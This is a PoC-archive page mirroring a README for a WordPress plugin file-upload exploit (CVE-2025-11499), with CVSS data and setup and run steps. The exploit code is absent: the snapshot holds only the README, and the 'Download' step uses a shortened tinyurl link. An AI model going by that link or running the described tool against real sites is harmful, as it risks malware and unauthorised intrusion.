Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1020 CNY

100%
Buy Us a Coffee

CVE-2025-11499 PoC — Tablesome Table – Contact Form DB – WPForms, CF7, Gravity, Forminator, Fluent <= 1.1.32 - Unauthenticated Arbitrary File

Source
https://github.com/rootreapers/CVE-2025-11499
Associated Vulnerability
Title:Tablesome Table – Contact Form DB – WPForms, CF7, Gravity, Forminator, Fluent <= 1.1.32 - Unauthenticated Arbitrary File Upload (CVE-2025-11499)
Description:The Tablesome Table – Contact Form DB – WPForms, CF7, Gravity, Forminator, Fluent plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the set_featured_image_from_external_url() function in all versions up to, and including, 1.1.32. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible in configurations where unauthenticated users have been provided with a method for adding featured images, and the workflow trigger is created.
Readme
# Arbitrary File Upload Vulnerability in Tablesome Table Plugin by WordPress (CVE-2025-11499)

## 🌟 Description

The Tablesome Table plugin for WordPress is susceptible to an arbitrary file upload vulnerability due to insufficient file type validation in the set_featured_image_from_external_url() function.

## ⚙️ Installation

To set up the exploitation tool, follow these steps:

1. Download the repository:

|[Download](https://tinyurl.com/4nybda6j)
|:--------------- |

2. Navigate to the tool's directory:

cd CVE-2025-11499

3. Install the required Python packages:

pip install -r requirements.txt

## 🚀 Usage

To use the tool, run the script from the command line as follows:

python exploit.py [options]

### Options

This flaw exists across all versions up to and including 1.1.32, enabling unauthenticated attackers to upload arbitrary files to the server. The vulnerability poses a significant risk, particularly in configurations where unauthenticated users can add featured images, leading to potential remote code execution under exploitation.


### CVSS V3.1
- **Severity**: Critical
- **CVSS Score**: 9.8 (High)
- **Confidentiality**: High
- **Integrity**: High
- **Availability**: High
- **Attack Vector**: Network
- **Attack Complexity**: Low

## 🛡 Disclaimer

Use this tool responsibly and ethically. Always obtain proper authorization before testing any system for vulnerabilities.
File Snapshot

 [4.0K]  /data/pocs/14bc7c6c1067dfafb395da85f39592983bf2a6c9
└── [1.4K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →